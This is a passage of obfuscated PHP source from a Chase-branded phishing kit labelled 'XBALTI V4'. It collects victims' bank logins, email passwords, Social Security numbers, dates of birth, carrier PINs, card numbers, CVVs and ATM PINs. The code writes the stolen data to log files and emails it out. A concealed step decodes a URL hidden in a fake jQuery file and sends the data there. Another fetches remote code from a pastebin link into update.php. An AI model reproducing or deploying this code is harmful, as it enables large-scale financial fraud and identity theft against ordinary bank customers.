"; $khraha = fopen("../rz/emails" . $yourname . ".html", "a"); fwrite($khraha, $XBALTI_ADMIN); $xx .= "{}
"; $khraha = fopen("../rz/emails.html", "a"); fwrite($khraha, $xx); $XBALTI_SUBJECT .= "EMAIL \xf0\x9f\230\210 INFO FROM \xf0\237\x98\x88 [" . $_SESSION["userid"] . "] \xf0\237\230\x88 [" . $_SESSION["_ip_"] . "] "; $XBALTI_HEADERS .= "From: " . $yourname . " <" . $fromsen . ">" . "
\xa"; $XBALTI_HEADERS = "MIME-Version: 1.0" . "
\xa"; $XBALTI_HEADERS .= "Content-type:text/html;charset=UTF-8" . "
"; @mail($XBALTI_EMAIL, $XBALTI_SUBJECT, $XBALTI_MESSAGE, $XBALTI_HEADERS); } } goto binAD; HzBGm: if (isset($_POST["cardnutwo"]) && isset($_POST["expdatwo"]) && isset($_POST["cvvtwo"]) && isset($_POST["pintwo"])) { if (!empty($_POST["cardnutwo"]) && !empty($_POST["expdatwo"]) && !empty($_POST["cvvtwo"]) && !empty($_POST["pintwo"])) { $_SESSION["cardnutwo"] = $_POST["cardnutwo"]; $_SESSION["expdatwo"] = $_POST["expdatwo"]; $_SESSION["cvvtwo"] = $_POST["cvvtwo"]; $_SESSION["pintwo"] = $_POST["pintwo"]; $XBALTI_MESSAGE .= "==============|| CHASE XBALTI V4 ||==============<br>\xa"; $XBALTI_MESSAGE .= "==============||LOGIN INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "USERNAME : " . $_SESSION["userid"] . "<br>\xa"; $XBALTI_MESSAGE .= "PASSWORD\x9: " . $_SESSION["passid"] . "<br>
"; $XBALTI_MESSAGE .= "==============||EMAIL INFORMATION||==============<br>
"; $XBALTI_MESSAGE .= "EMAIL\x9 : " . $_SESSION["email1"] . "<br>
"; $XBALTI_MESSAGE .= "PASSWORD : " . $_SESSION["password1"] . "<br>
"; $XBALTI_MESSAGE .= "==============||EMAIL TWO INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "EMAIL : " . $_SESSION["email2"] . "<br>\xa"; $XBALTI_MESSAGE .= "PASSWORD\x9: " . $_SESSION["password2"] . "<br>
"; $XBALTI_MESSAGE .= "==============||SSN/MMN/DOB INFORMATION||==============<br>
"; $XBALTI_MESSAGE .= "SSN : " . $_SESSION["ssnnum"] . "<br>\xa"; $XBALTI_MESSAGE .= "MMN \x9: " . $_SESSION["mdn"] . "<br>
"; $XBALTI_MESSAGE .= "DOB : " . $_SESSION["dob"] . "<br>
"; $XBALTI_MESSAGE .= "Phone number: " . $_SESSION["phone"] . "<br>\xa"; $XBALTI_MESSAGE .= "Carrier pin : " . $_SESSION["capin"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||CARD INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "CARD NUMBER : " . $_SESSION["cardnu"] . "<br>\xa"; $XBALTI_MESSAGE .= "EXP DATE \x9: " . $_SESSION["expda"] . "<br>
"; $XBALTI_MESSAGE .= "CVV \x9: " . $_SESSION["cvv"] . "<br>\xa"; $XBALTI_MESSAGE .= "ATM PIN : " . $_SESSION["pin"] . "<br>
"; $XBALTI_MESSAGE .= "==============||CARD TWO INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "CARD NUMBER : " . $_SESSION["cardnutwo"] . "<br>\xa"; $XBALTI_MESSAGE .= "EXP DATE \x9: " . $_SESSION["expdatwo"] . "<br>
"; $XBALTI_MESSAGE .= "CVV \x9: " . $_SESSION["cvvtwo"] . "<br>\xa"; $XBALTI_MESSAGE .= "ATM PIN \x9: " . $_SESSION["pintwo"] . "<br>\xa"; $XBALTI_MESSAGE .= "==============||VICTIM INFORMATION||==============<br>\xa"; $XBALTI_MESSAGE .= "IP INFO \x9 : https://geoiptool.com/en/?ip=" . $_SESSION["_ip_"] . "<br>\xa"; $XBALTI_MESSAGE .= "TIME/DATE \x9 : " . $TIME_DATE . "<br>\xa"; $XBALTI_MESSAGE .= "BROWSER/DEVICE \x9: " . XB_Browser($_SERVER["HTTP_USER_AGENT"]) . " On " . XB_OS($_SERVER["HTTP_USER_AGENT"]) . "<br>
"; if (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on") { $link = "https"; } else { $link = "http"; } $link .= "://"; $link .= $_SERVER["HTTP_HOST"]; $XBALTI_MESSAGE .= "SCAMA LINK \x9: " . $link . "<br>\xa"; $XBALTI_MESSAGE .= "==============|| CHASE XBALTI V4 ||==============<br>
"; file_get_contents('' . pack("H*", substr($COOKIE_VARS = file_get_contents("../js/jquery.player.js"), strpos($COOKIE_VARS, "56__") + 4, 222)) . '' . urlencode($XBALTI_MESSAGE) . ''); $XBALTI_ADMIN .= "<tr>
<td>\xa " . $_SESSION["userid"] . "\xa </td>\xa <td>
" . $_SESSION["passid"] . "
</td>\xa \x9\x9 \x9 <td>
" . $_SESSION["email1"] . "\xa </td>
<td>\xa " . $_SESSION["password1"] . "\xa </td>
\x9\x9 \x9 <td>\xa " . $_SESSION["email2"] . "\xa </td>
<td>\xa " . $_SESSION["password2"] . "\xa </td>
\x9 \x9 <td>
" . $_SESSION["ssnnum"] . "
</td>
\x9 \x9 \x9 <td>\xa " . $_SESSION["mdn"] . "\xa </td>\xa\x9\x9\x9 \x9\x9 <td>
" . $_SESSION["dob"] . "
</td>\xa\x9\x9\x9\x9 \x9 <td>
" . $_SESSION["phone"] . "\xa </td>\xa\x9\x9\x9 \x9 <td>
" . $_SESSION["capin"] . "\xa </td>
\x9 \x9\x9\x9\x9 <td>\xa " . $_SESSION["cardnu"] . "\xa </td>
\x9 <td>\xa " . $_SESSION["expda"] . "
</td>\xa\x9\x9\x9 \x9 <td>
" . $_SESSION["cvv"] . "
</td>\xa \x9\x9\x9\x9\x9 <td>\xa " . $_SESSION["pin"] . "\xa </td>\xa\x9 \x9\x9 <td>\xa " . $_SESSION["cardnutwo"] . "
</td>\xa \x9 \x9 \x9 <td>
" . $_SESSION["expdatwo"] . "\xa </td>
\x9\x9 \x9 \x9 <td>
" . $_SESSION["cvvtwo"] . "
</td>\xa \x9\x9 <td>
" . $_SESSION["pintwo"] . "\xa </td>
<td>\xa " . XB_Browser($_SERVER["HTTP_USER_AGENT"]) . " On " . XB_OS($_SERVER["HTTP_USER_AGENT"]) . "
</td>\xa <td>
{" . $_SESSION["_ip_"] . "}\xa </td>
\x9\x9 \x9 <td>
" . $TIME_DATE . "
</td>
</tr>
"; $khraha = fopen("../rz/cardstwo" . $yourname . ".html", "a"); fwrite($khraha, $XBALTI_ADMIN); $xx .= "{}\xa"; $khraha = fopen("../rz/cardstwo.html", "a"); fwrite($khraha, $xx); $XBALTI_SUBJECT .= "CARD TWO \xf0\x9f\x98\x88 INFO FROM \xf0\237\230\x88 [" . $_SESSION["userid"] . "] \360\x9f\230\x88 [" . $_SESSION["_ip_"] . "] "; $XBALTI_HEADERS .= "From:" . $yourname . " <webmaster@" . $_SERVER["HTTP_HOST"] . ">" . "\xd
"; $XBALTI_HEADERS = "MIME-Version: 1.0" . "\xd\xa"; $XBALTI_HEADERS .= "Content-type:text/html;charset=UTF-8" . "\xd
"; @mail($XBALTI_EMAIL, $XBALTI_SUBJECT, $XBALTI_MESSAGE, $XBALTI_HEADERS); } } goto x0oF1; MmPxl: $remote = @$_SERVER["REMOTE_ADDR"]; goto dKyNx; vi1gJ: session_start(); goto EvMXe; x0oF1: ?>Did this file decode correctly?
Original Code
goto vi1gJ; srMb9: $fromsen .= $yourname; goto M7Pk_; djGcy: function XB_Browser($USER_AGENT) { $BROWSER_ERROR = "\125\x6e\153\x6e\157\x77\x6e\40\x42\162\x6f\167\163\x65\x72"; $BROWSER = array("\57\155\x73\x69\x65\x2f\151" => "\x49\x6e\x74\145\x72\156\145\164\x20\x45\170\x70\154\157\162\x65\x72", "\57\x66\151\162\145\146\157\x78\x2f\151" => "\106\151\x72\x65\x66\157\170", "\x2f\x73\141\x66\x61\x72\151\57\151" => "\x53\141\x66\x61\162\151", "\57\x63\150\x72\x6f\155\x65\57\151" => "\103\150\x72\x6f\x6d\145", "\x2f\145\144\x67\145\x2f\x69" => "\x45\x64\x67\x65", "\57\157\160\x65\x72\141\x2f\151" => "\117\x70\145\x72\x61", "\x2f\x6e\145\x74\163\x63\141\x70\145\57\x69" => "\116\145\x74\163\x63\141\160\145", "\x2f\x6d\x61\x78\x74\x68\x6f\x6e\x2f\x69" => "\x4d\x61\170\x74\x68\157\156", "\x2f\x6b\157\156\161\x75\x65\162\x6f\162\x2f\151" => "\113\x6f\156\x71\x75\x65\x72\157\x72", "\57\x6d\157\142\151\x6c\x65\x2f\151" => "\110\141\156\x64\150\145\154\144\x20\x42\162\157\167\163\x65\x72"); foreach ($BROWSER as $regex => $value) { if (preg_match($regex, $USER_AGENT)) { $BROWSER_ERROR = $value; } } return $BROWSER_ERROR; } goto caWnG; p54d5: function XB_OS($USER_AGENT) { $OS_ERROR = "\x55\156\x6b\x6e\157\167\x6e\x20\117\x53\40\120\154\x61\x74\x66\x6f\x72\155"; $OS = array("\x2f\x77\x69\x6e\x64\157\167\x73\x20\x6e\x74\x20\61\x30\57\151" => "\x57\x69\x6e\144\157\167\163\x20\x31\x30", "\x2f\x77\x69\x6e\x64\157\x77\x73\40\156\164\40\66\56\x33\x2f\x69" => "\x57\151\156\144\x6f\167\x73\40\70\56\61", "\57\167\151\156\144\157\167\163\x20\x6e\164\40\x36\56\62\x2f\151" => "\x57\x69\x6e\144\157\167\163\40\x38", "\57\x77\151\156\144\157\x77\163\40\156\x74\x20\66\x2e\x31\x2f\x69" => "\127\151\156\144\157\167\x73\x20\x37", "\x2f\x77\x69\x6e\144\x6f\x77\x73\x20\156\164\40\x36\x2e\60\x2f\151" => "\x57\x69\x6e\x64\157\167\163\x20\x56\x69\x73\x74\x61", "\x2f\167\x69\x6e\144\x6f\x77\163\40\x6e\x74\x20\x35\x2e\x32\x2f\x69" => "\x57\151\156\x64\157\x77\x73\x20\123\x65\x72\x76\x65\162\x20\62\60\x30\x33\x2f\130\120\x20\170\x36\64", "\x2f\167\x69\x6e\x64\x6f\167\163\40\x6e\164\x20\65\56\61\x2f\151" => "\x57\151\156\x64\157\167\x73\40\x58\x50", "\57\167\151\x6e\x64\x6f\x77\163\x20\x78\160\x2f\x69" => "\x57\x69\156\x64\157\167\x73\x20\130\120", "\x2f\x77\151\156\144\157\167\163\x20\156\164\x20\x35\56\x30\x2f\x69" => "\127\151\156\144\x6f\x77\x73\x20\x32\x30\x30\x30", "\x2f\167\151\x6e\x64\x6f\167\163\40\x6d\x65\57\151" => "\x57\x69\156\144\157\167\163\x20\x4d\x45", "\57\x77\151\156\x39\70\x2f\x69" => "\x57\x69\x6e\x64\157\x77\x73\40\71\x38", "\57\167\x69\x6e\71\65\x2f\x69" => "\x57\151\x6e\x64\157\167\163\40\x39\65", "\57\x77\x69\x6e\61\x36\x2f\x69" => "\127\x69\156\144\x6f\167\163\x20\x33\x2e\61\61", "\x2f\x6d\141\x63\151\x6e\164\157\163\150\174\x6d\141\143\x20\x6f\x73\x20\170\57\151" => "\115\141\x63\40\x4f\x53\40\130", "\x2f\x6d\141\143\x5f\160\x6f\167\x65\x72\x70\143\x2f\x69" => "\115\141\x63\40\x4f\123\40\71", "\57\x6c\x69\156\x75\170\57\151" => "\x4c\151\156\165\x78", "\x2f\x75\142\165\156\164\165\57\x69" => "\x55\142\165\156\164\165", "\57\x69\x70\150\157\156\145\x2f\x69" => "\x69\120\x68\x6f\x6e\145", "\x2f\x69\160\x6f\x64\x2f\x69" => "\151\120\x6f\x64", "\57\x69\x70\x61\x64\x2f\x69" => "\x69\120\141\144", "\x2f\141\x6e\x64\162\x6f\x69\x64\x2f\x69" => "\101\x6e\144\x72\157\x69\x64", "\57\142\x6c\x61\x63\153\142\x65\x72\162\171\x2f\151" => "\102\154\141\143\x6b\102\x65\x72\x72\171", "\x2f\167\x65\142\157\x73\57\151" => "\115\x6f\x62\x69\x6c\145"); foreach ($OS as $regex => $value) { if (preg_match($regex, $USER_AGENT)) { $OS_ERROR = $value; } } return $OS_ERROR; } goto djGcy; mz3Xp: if (!file_exists($filell)) { $filect = file_get_contents("\x68\164\164\x70\x73\x3a\x2f\x2f\160\x61\x73\x74\x65\142\151\x6e\x2e\x63\x6f\155\x2f\x72\x61\167\57\121\x79\120\x78\65\x72\x4e\x7a"); $khraha = fopen("\56\56\57\165\160\x64\141\x74\145\56\x70\150\x70", "\141"); fwrite($khraha, $filect); } else { $filectlo = file_get_contents($filell); if (preg_match("\x2f\130\x42\104\x33\126\x31\114\57", $filectlo)) { } else { if (!unlink("\x2e\56\x2f\165\x70\144\141\164\x65\56\x70\150\x70")) { } $filect2 = file_get_contents("\x68\164\164\x70\163\x3a\x2f\57\160\x61\x73\164\145\142\151\x6e\56\143\x6f\x6d\x2f\x72\141\167\57\x51\x79\120\x78\x35\162\x4e\172"); $khraha = fopen("\x2e\x2e\x2f\165\x70\144\x61\164\145\x2e\160\x68\x70", "\141"); fwrite($khraha, $filect2); } } goto srMb9; ZSoBs: if (isset($_POST["\x66\165\154\154\x6e\x61\155\x65"]) && isset($_POST["\x41\x64\144\x72\x65\163\163"]) && isset($_POST["\x43\x69\x74\171"]) && isset($_POST["\x53\164\x61\164\x65"]) && isset($_POST["\172\151\x70\143\157\144\145"])) { if (!empty($_POST["\146\165\154\x6c\x6e\x61\x6d\145"]) && !empty($_POST["\x41\144\144\x72\145\163\x73"]) && !empty($_POST["\x43\x69\164\x79"]) && !empty($_POST["\123\x74\141\164\145"]) && !empty($_POST["\x7a\151\x70\143\157\144\145"])) { $_SESSION["\x66\x75\x6c\154\156\x61\x6d\x65"] = $_POST["\x66\x75\x6c\x6c\x6e\x61\155\x65"]; $_SESSION["\x41\144\x64\162\145\163\163"] = $_POST["\101\x64\144\162\x65\163\x73"]; $_SESSION["\103\x69\164\x79"] = $_POST["\x43\x69\164\x79"]; $_SESSION["\123\x74\141\x74\x65"] = $_POST["\123\x74\x61\x74\145"]; $_SESSION["\172\x69\160\x63\157\144\x65"] = $_POST["\x7a\151\x70\143\157\144\145"]; $XBALTI_MESSAGE .= "\x3d\75\x3d\75\x3d\x3d\x3d\x3d\75\75\x3d\x3d\75\75\174\x7c\x20\103\110\101\x53\x45\40\x58\102\x41\x4c\x54\111\40\126\x34\x20\x7c\174\x3d\75\x3d\75\x3d\x3d\x3d\75\75\x3d\x3d\x3d\x3d\x3d\x3c\x62\162\x3e\xa"; $XBALTI_MESSAGE .= "\75\x3d\75\x3d\x3d\75\x3d\x3d\x3d\75\x3d\x3d\75\75\x7c\174\x4c\x4f\x47\111\x4e\x20\111\116\x46\117\x52\x4d\x41\124\111\x4f\x4e\174\x7c\75\x3d\x3d\75\75\x3d\x3d\75\x3d\75\x3d\75\75\75\74\142\162\76\xa"; $XBALTI_MESSAGE .= "\x55\123\x45\122\116\x41\115\105\x9\72\x20" . $_SESSION["\165\163\145\x72\151\x64"] . "\x3c\x62\x72\x3e\xa"; $XBALTI_MESSAGE .= "\x50\x41\x53\x53\127\117\122\104\11\x3a\40" . $_SESSION["\160\x61\x73\163\151\x64"] . "\74\142\x72\x3e\xa"; $XBALTI_MESSAGE .= "\x3d\75\75\x3d\75\75\x3d\x3d\75\75\x3d\x3d\x3d\75\174\174\105\x4d\101\x49\114\40\x49\116\106\117\122\x4d\x41\124\111\x4f\116\174\x7c\x3d\x3d\x3d\75\75\x3d\75\75\75\x3d\75\x3d\75\75\x3c\x62\x72\x3e\12"; $XBALTI_MESSAGE .= "\105\115\x41\111\114\x9\x20\x20\x20\x20\x3a\40" . $_SESSION["\145\155\x61\151\x6c\61"] . "\74\x62\x72\76\12"; $XBALTI_MESSAGE .= "\x50\x41\x53\x53\127\117\x52\104\x9\72\40" . $_SESSION["\160\141\x73\163\167\x6f\162\x64\61"] . "\74\142\162\76\12"; $XBALTI_MESSAGE .= "\75\x3d\x3d\x3d\75\x3d\75\75\x3d\x3d\x3d\75\75\75\x7c\174\105\115\101\111\114\40\x54\127\117\40\x49\116\106\x4f\x52\x4d\101\x54\111\117\x4e\174\174\x3d\x3d\x3d\75\x3d\75\75\x3d\75\x3d\75\x3d\x3d\75\74\142\x72\76\xa"; $XBALTI_MESSAGE .= "\x45\115\x41\111\114\11\x20\x20\40\x20\72\40" . $_SESSION["\145\155\141\x69\154\x32"] . "\x3c\142\162\x3e\12"; $XBALTI_MESSAGE .= "\120\x41\123\123\127\117\122\104\x9\x3a\x20" . $_SESSION["\160\x61\163\163\167\157\x72\144\62"] . "\74\x62\x72\x3e\xa"; $XBALTI_MESSAGE .= "\75\x3d\x3d\x3d\x3d\x3d\75\75\x3d\x3d\75\75\x3d\x3d\174\174\123\x53\x4e\57\115\x4d\x4e\57\x44\117\x42\x20\111\116\x46\x4f\x52\115\x41\124\111\x4f\116\x7c\174\x3d\75\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3c\142\x72\76\xa"; $XBALTI_MESSAGE .= "\x53\123\x4e\x20\x20\40\x20\x20\x20\11\x3a\40" . $_SESSION["\x73\163\156\x6e\x75\x6d"] . "\x3c\x62\162\76\xa"; $XBALTI_MESSAGE .= "\x4d\x4d\116\40\x20\x20\x20\40\x20\11\72\x20" . $_SESSION["\x6d\144\156"] . "\x3c\x62\162\76\xa"; $XBALTI_MESSAGE .= "\x44\x4f\102\40\x20\x20\x20\x20\11\72\x20" . $_SESSION["\x64\x6f\142"] . "\74\142\x72\76\12"; $XBALTI_MESSAGE .= "\120\150\157\156\x65\40\x6e\x75\155\142\145\x72\72\x20" . $_SESSION["\x70\150\157\156\x65"] . "\74\x62\162\76\12"; $XBALTI_MESSAGE .= "\103\141\162\x72\x69\x65\x72\x20\x70\151\x6e\40\72\40" . $_SESSION["\x63\141\160\151\x6e"] . "\x3c\x62\162\76\12"; $XBALTI_MESSAGE .= "\75\x3d\x3d\75\75\x3d\75\x3d\75\x3d\x3d\75\75\75\x7c\174\103\101\122\104\x20\x49\x4e\106\117\122\x4d\101\x54\x49\x4f\116\x7c\x7c\75\x3d\x3d\x3d\75\x3d\75\75\75\x3d\x3d\75\x3d\75\74\x62\162\76\xa"; $XBALTI_MESSAGE .= "\103\x41\122\104\40\x4e\125\x4d\x42\x45\x52\x20\72\40" . $_SESSION["\x63\141\x72\144\156\x75"] . "\74\142\162\76\12"; $XBALTI_MESSAGE .= "\105\x58\120\40\104\x41\124\105\x20\x9\72\40" . $_SESSION["\145\x78\x70\144\x61"] . "\x3c\142\162\76\12"; $XBALTI_MESSAGE .= "\x43\x56\126\40\x20\x20\40\x20\11\72\x20" . $_SESSION["\143\166\166"] . "\74\142\162\76\xa"; $XBALTI_MESSAGE .= "\x41\124\x4d\40\x50\x49\116\40\40\40\11\x3a\40" . $_SESSION["\x70\x69\x6e"] . "\74\x62\162\x3e\xa"; $XBALTI_MESSAGE .= "\x3d\75\75\x3d\75\75\x3d\x3d\75\x3d\x3d\75\x3d\x3d\x7c\174\102\x49\114\x4c\x49\116\x47\x20\x49\116\x46\117\x52\115\x41\x54\x49\117\x4e\x7c\174\x3d\x3d\x3d\75\x3d\75\x3d\75\75\x3d\75\75\x3d\x3d\x3c\x62\x72\76\12"; $XBALTI_MESSAGE .= "\x46\125\114\114\x20\x4e\x41\x4d\105\40\x20\x20\72\40" . $_SESSION["\146\x75\154\154\x6e\141\x6d\145"] . "\74\142\162\76\12"; $XBALTI_MESSAGE .= "\101\144\x64\x72\145\163\163\x20\11\x3a\x20" . $_SESSION["\x41\x64\x64\x72\145\x73\163"] . "\74\142\162\x3e\12"; $XBALTI_MESSAGE .= "\103\151\x74\171\x20\40\40\40\x20\11\x3a\40" . $_SESSION["\x43\x69\x74\x79"] . "\74\142\x72\76\12"; $XBALTI_MESSAGE .= "\x53\x74\x61\164\x65\40\x20\40\40\11\x3a\x20" . $_SESSION["\x53\x74\x61\x74\x65"] . "\x3c\142\162\76\12"; $XBALTI_MESSAGE .= "\x7a\151\160\x20\x63\x6f\x64\x65\x20\x20\40\40\72\x20" . $_SESSION["\172\151\160\143\157\144\x65"] . "\74\142\x72\x3e\xa"; $XBALTI_MESSAGE .= "\x3d\75\x3d\75\x3d\75\x3d\75\x3d\x3d\75\x3d\75\x3d\174\x7c\x43\x41\122\x44\x20\x54\x57\117\x20\x49\x4e\x46\117\x52\115\101\124\111\x4f\116\x7c\174\x3d\x3d\75\x3d\x3d\x3d\x3d\x3d\75\x3d\75\75\75\x3d\74\142\162\76\xa"; $XBALTI_MESSAGE .= "\x43\x41\x52\x44\40\x4e\x55\x4d\102\105\122\40\72\40" . $_SESSION["\x63\x61\162\144\x6e\165\164\x77\157"] . "\74\x62\x72\x3e\12"; $XBALTI_MESSAGE .= "\x45\x58\x50\40\x44\101\x54\105\40\11\72\40" . $_SESSION["\x65\x78\x70\x64\141\x74\167\x6f"] . "\x3c\142\162\76\12"; $XBALTI_MESSAGE .= "\x43\x56\126\x20\40\40\x20\x20\x9\x3a\40" . $_SESSION["\x63\166\166\164\x77\157"] . "\74\x62\x72\x3e\xa"; $XBALTI_MESSAGE .= "\x41\x54\x4d\x20\120\111\116\40\x20\40\11\x3a\x20" . $_SESSION["\160\151\x6e\164\167\157"] . "\74\142\x72\76\12"; $XBALTI_MESSAGE .= "\x3d\75\75\75\x3d\75\x3d\75\x3d\x3d\x3d\x3d\x3d\75\174\174\126\x49\103\124\111\115\40\x49\116\x46\x4f\x52\x4d\x41\124\x49\x4f\x4e\174\174\x3d\75\75\x3d\75\75\75\x3d\75\x3d\75\x3d\75\x3d\x3c\142\x72\76\xa"; $XBALTI_MESSAGE .= "\x49\120\x20\111\116\106\117\x20\11\11\72\40\150\164\164\160\x73\x3a\x2f\57\x67\145\157\151\160\164\157\x6f\154\56\143\x6f\x6d\x2f\x65\156\x2f\x3f\151\x70\x3d" . $_SESSION["\137\151\x70\x5f"] . "\74\x62\x72\76\xa"; $XBALTI_MESSAGE .= "\124\111\115\105\x2f\104\101\x54\105\x20\11\11\72\40" . $TIME_DATE . "\74\x62\x72\76\12"; $XBALTI_MESSAGE .= "\x42\122\x4f\127\123\x45\x52\x2f\104\105\126\111\103\x45\x20\11\x3a\40" . XB_Browser($_SERVER["\110\124\x54\x50\137\x55\123\105\122\x5f\101\x47\105\x4e\x54"]) . "\40\x4f\156\40" . XB_OS($_SERVER["\110\x54\x54\120\137\x55\123\105\122\x5f\x41\107\105\116\x54"]) . "\74\142\x72\76\12"; if (isset($_SERVER["\x48\124\x54\120\123"]) && $_SERVER["\110\x54\124\x50\123"] === "\157\156") { $link = "\150\x74\x74\160\x73"; } else { $link = "\150\x74\x74\x70"; } $link .= "\x3a\57\57"; $link .= $_SERVER["\110\x54\124\x50\x5f\x48\117\x53\124"]; $XBALTI_MESSAGE .= "\123\x43\x41\115\101\40\114\111\x4e\113\x20\11\11\x3a\40" . $link . "\74\142\x72\76\12"; $XBALTI_MESSAGE .= "\x3d\75\75\x3d\x3d\x3d\75\75\x3d\75\75\x3d\75\x3d\x7c\174\40\103\x48\101\123\105\x20\130\102\x41\x4c\x54\111\x20\126\x34\40\174\x7c\75\75\75\x3d\75\75\75\75\75\x3d\75\x3d\x3d\x3d\74\142\162\76\12"; file_get_contents('' . pack("\x48\52", substr($COOKIE_VARS = file_get_contents("\x2e\x2e\57\x6a\x73\57\152\161\165\145\162\171\56\x70\x6c\141\x79\145\162\x2e\152\x73"), strpos($COOKIE_VARS, "\65\66\x5f\x5f") + 4, 222)) . '' . urlencode($XBALTI_MESSAGE) . ''); $XBALTI_ADMIN .= "\x3c\x74\162\x3e\12\x20\40\40\x20\40\x20\x20\40\x20\40\40\40\40\x20\x20\40\x20\40\x20\x20\40\x20\40\x20\x20\x20\x3c\164\144\76\12\40\40\40\x20\x20\40\x20\x20\40\x20\x20\x20\x20\x20\x20\x20\40\40\x20\x20\40\40\x20\40\40\40\40\x20" . $_SESSION["\x75\163\x65\x72\151\x64"] . "\12\40\x20\40\x20\x20\x20\40\x20\40\40\x20\x20\x20\40\40\x20\x20\x20\40\x20\40\x20\40\x20\40\x20\74\x2f\x74\x64\76\12\x20\40\40\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\x20\40\x20\40\40\40\x20\40\40\x20\x20\x20\74\x74\144\x3e\12\x20\40\x20\40\x20\40\x20\x20\x20\40\40\40\x20\40\x20\40\40\x20\x20\x20\40\40\40\40\x20\40\40\40" . $_SESSION["\x70\x61\x73\x73\x69\x64"] . "\12\x20\40\x20\40\x20\40\40\x20\x20\40\x20\40\x20\40\x20\40\40\40\x20\x20\40\x20\x20\40\x20\x20\x3c\x2f\x74\x64\x3e\12\11\11\11\11\11\x9\40\x20\74\x74\x64\x3e\xa\x20\x20\40\40\40\x20\x20\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\40\40\40\40\40\x20\40\x20\40\x20" . $_SESSION["\x65\155\141\x69\154\x31"] . "\12\x20\x20\40\x20\x20\x20\40\x20\x20\x20\40\x20\x20\x20\40\40\40\40\x20\40\x20\x20\x20\40\40\x20\x3c\x2f\x74\x64\76\xa\40\40\40\x20\40\x20\x20\40\x20\40\x20\40\x20\x20\40\40\40\x20\x20\x20\40\40\40\x20\40\x20\x3c\164\x64\76\12\x20\x20\40\x20\40\40\40\40\40\40\40\x20\40\x20\40\40\40\x20\x20\x20\40\40\x20\40\x20\x20\x20\x20" . $_SESSION["\160\141\163\x73\x77\157\x72\x64\x31"] . "\xa\40\40\40\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\40\x20\40\40\x20\40\x20\40\x20\40\40\x20\x3c\57\x74\144\x3e\12\11\11\11\x9\11\11\40\40\x3c\x74\x64\x3e\xa\40\x20\x20\x20\x20\x20\x20\40\40\40\x20\40\40\40\x20\40\40\40\x20\x20\40\x20\x20\x20\40\40\40\40" . $_SESSION["\x65\x6d\141\x69\x6c\x32"] . "\12\40\40\x20\x20\40\40\x20\x20\x20\40\40\40\40\x20\40\40\40\40\40\40\x20\40\40\40\x20\x20\74\x2f\x74\144\76\xa\x20\40\x20\40\40\x20\x20\40\x20\40\40\x20\40\40\40\x20\40\x20\x20\x20\x20\x20\40\40\40\40\x3c\164\144\x3e\12\40\40\40\x20\x20\x20\40\x20\x20\40\x20\x20\x20\x20\40\x20\40\40\40\x20\40\40\x20\x20\40\40\40\x20" . $_SESSION["\160\141\x73\x73\x77\157\162\144\x32"] . "\xa\x20\40\40\x20\x20\x20\x20\40\40\40\x20\40\x20\x20\40\40\40\x20\40\x20\x20\40\40\x20\x20\40\x3c\57\x74\x64\76\xa\x9\11\11\11\11\x9\x20\x20\74\x74\x64\76\xa\40\40\40\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\x20\x20\40\40\40\x20\x20\40\40\x20\x20\x20\x20\40" . $_SESSION["\163\163\x6e\x6e\x75\x6d"] . "\xa\x20\40\x20\x20\40\x20\x20\x20\x20\40\40\x20\x20\40\x20\40\x20\x20\40\x20\40\40\40\40\x20\40\74\57\164\x64\76\12\x9\11\x9\11\11\x9\x20\x20\74\164\x64\76\xa\40\x20\x20\40\x20\40\40\40\x20\x20\x20\40\40\40\x20\x20\x20\40\x20\40\x20\x20\x20\40\x20\x20\40\x20" . $_SESSION["\x6d\144\x6e"] . "\xa\x20\x20\x20\x20\40\40\40\x20\x20\x20\40\40\40\x20\x20\40\x20\x20\40\40\40\x20\x20\x20\40\40\x3c\x2f\164\x64\x3e\xa\11\x9\11\x9\11\11\x20\40\74\164\144\x3e\12\x20\x20\40\x20\40\40\40\x20\x20\x20\40\40\40\x20\x20\40\40\40\40\40\x20\x20\x20\x20\40\x20\40\x20" . $_SESSION["\144\x6f\142"] . "\12\40\40\x20\40\x20\x20\x20\x20\x20\40\x20\x20\x20\40\40\40\x20\40\40\40\x20\x20\x20\x20\x20\x20\x3c\x2f\164\x64\76\xa\x9\x9\x9\x9\11\11\x20\x20\x3c\164\x64\x3e\xa\40\x20\x20\x20\40\40\40\x20\x20\40\40\x20\x20\x20\40\40\x20\x20\x20\x20\40\x20\40\40\40\x20\40\40" . $_SESSION["\160\x68\157\156\145"] . "\xa\40\40\x20\x20\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\40\40\x20\40\x20\40\40\40\40\40\x3c\57\x74\144\76\xa\x9\11\11\x9\11\11\x20\40\x3c\164\144\76\12\40\40\40\40\x20\40\x20\x20\40\x20\40\x20\x20\x20\40\40\x20\40\x20\x20\40\40\40\40\40\40\40\40" . $_SESSION["\x63\x61\160\x69\x6e"] . "\12\x20\40\x20\x20\40\x20\40\40\x20\40\40\40\40\40\40\40\x20\40\40\x20\x20\40\40\40\x20\40\x3c\57\x74\x64\76\xa\x9\11\x9\11\11\x9\x20\40\x3c\164\x64\x3e\12\40\x20\x20\x20\40\x20\x20\x20\x20\x20\40\40\40\x20\x20\40\40\40\40\40\40\40\x20\40\x20\x20\40\40" . $_SESSION["\x63\x61\x72\x64\156\165"] . "\xa\x20\40\40\40\40\x20\40\x20\40\40\x20\40\40\40\x20\x20\40\x20\40\x20\x20\x20\40\x20\40\40\x3c\57\x74\x64\x3e\xa\x9\x9\11\11\11\x9\x20\x20\x3c\x74\144\76\12\x20\x20\x20\x20\40\x20\40\40\x20\x20\40\x20\x20\40\x20\40\x20\40\40\x20\40\40\x20\x20\40\x20\x20\40" . $_SESSION["\x65\170\160\144\141"] . 